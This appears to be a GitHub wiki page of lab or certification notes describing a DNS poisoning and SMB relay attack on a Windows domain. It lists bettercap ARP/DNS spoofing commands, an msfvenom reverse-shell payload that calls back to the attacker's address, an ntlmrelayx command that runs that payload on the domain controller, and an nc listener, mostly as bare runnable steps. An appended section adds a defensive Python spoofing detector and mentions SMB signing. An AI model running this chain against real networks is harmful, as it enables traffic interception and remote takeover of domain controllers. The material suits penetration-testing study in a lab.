DNS poisoning and SMB relay - oscpname/RELAY_scenarios GitHub Wiki
Tools:
- bettercap
- msfvenom
- ntlmrelayx
IPs:
- Attacker 172.16.5.150
- Gateway 172.16.5.1
- Domain Controller 172.16.5.10 (FQDN: dc01.sportsfoo.com)
- Some client host 172.16.5.30
- Set up bettercap for ARP/DNS spoofing (bettercap session):

```
172.16.5.0/24 > 172.16.5.150 » set dns.spoof.address 172.16.5.150
172.16.5.0/24 > 172.16.5.150 » set dns.spoof.domains sportsfoo.com
172.16.5.0/24 > 172.16.5.150 » get dns.spoof*
dns.spoof.address: '172.16.5.150'
dns.spoof.all: 'false'
dns.spoof.domains: 'sportsfoo.com'
dns.spoof.hosts: ''
172.16.5.0/24 > 172.16.5.150 » set arp.spoof.targets 172.16.5.1, 172.16.5.30
172.16.5.0/24 > 172.16.5.150 » set arp.spoof.internal true
172.16.5.0/24 > 172.16.5.150 » get arp*
arp.spoof.internal: 'true'
arp.spoof.targets: '172.16.5.1, 172.16.5.30'
arp.spoof.whitelist: ''
```
- Generate the payload with msfvenom:

```
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=172.16.5.150 LPORT=4444 -f exe -o payload.exe
```
- Run ntlmrelayx.py against the domain controller:

```
ntlmrelayx.py -t 172.16.5.10 -e payload.exe
```
- Prepare the listener, then activate spoofing in the bettercap session:

```
nc -nlvp 4444
```

```
dns.spoof on
arp.spoof on
```
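As an added defensive illustration (not part of this wiki page), a small Python detector for the two spoofing signs this scenario produces, run over constructed sample ARP replies and DNS answers built from the page's addresses; the MAC values and the expected-host set for sportsfoo.com are assumptions.

```python
# Added example, not the wiki author's code: flag the ARP cache poisoning of the
# gateway and the DNS answers redirecting sportsfoo.com names to a non-DC address.

GATEWAY_IP = "172.16.5.1"
PROTECTED_DOMAIN = "sportsfoo.com"
# Assumption: names under sportsfoo.com are only expected to resolve to the DC.
EXPECTED_DOMAIN_HOSTS = {"172.16.5.10"}


def detect_arp_spoof(arp_events):
    """arp_events: iterable of (ip, mac) pairs taken from observed ARP replies.
    Returns one (ip, first_mac, new_mac) tuple per IP whose MAC changed, the
    classic sign of ARP cache poisoning."""
    first_seen = {}
    alerts = []
    reported = set()
    for ip, mac in arp_events:
        mac = mac.lower()
        known = first_seen.setdefault(ip, mac)
        if known != mac and ip not in reported:
            alerts.append((ip, known, mac))
            reported.add(ip)
    return alerts


def detect_dns_spoof(dns_answers):
    """dns_answers: iterable of (qname, answer_ip). Returns answers for the
    protected domain that point outside the expected host set."""
    suffix = "." + PROTECTED_DOMAIN
    return [
        (qname, ip)
        for qname, ip in dns_answers
        if (qname == PROTECTED_DOMAIN or qname.endswith(suffix))
        and ip not in EXPECTED_DOMAIN_HOSTS
    ]


# Constructed sample events mirroring the scenario: the gateway's MAC changes
# (attacker 172.16.5.150 answering for it) and dc01 resolves to the attacker.
SAMPLE_ARP = [
    ("172.16.5.1", "00:11:22:33:44:01"),   # assumed real gateway MAC
    ("172.16.5.30", "00:11:22:33:44:30"),  # assumed client MAC
    ("172.16.5.1", "00:11:22:33:44:99"),   # assumed attacker MAC claiming the gateway
]
SAMPLE_DNS = [
    ("dc01.sportsfoo.com", "172.16.5.10"),
    ("dc01.sportsfoo.com", "172.16.5.150"),
    ("printer.local", "172.16.5.40"),
]

if __name__ == "__main__":
    print("ARP alerts:", detect_arp_spoof(SAMPLE_ARP))
    print("DNS alerts:", detect_dns_spoof(SAMPLE_DNS))
```

Independently of detecting the spoofing, a relay target that requires SMB signing defeats the ntlmrelayx step itself.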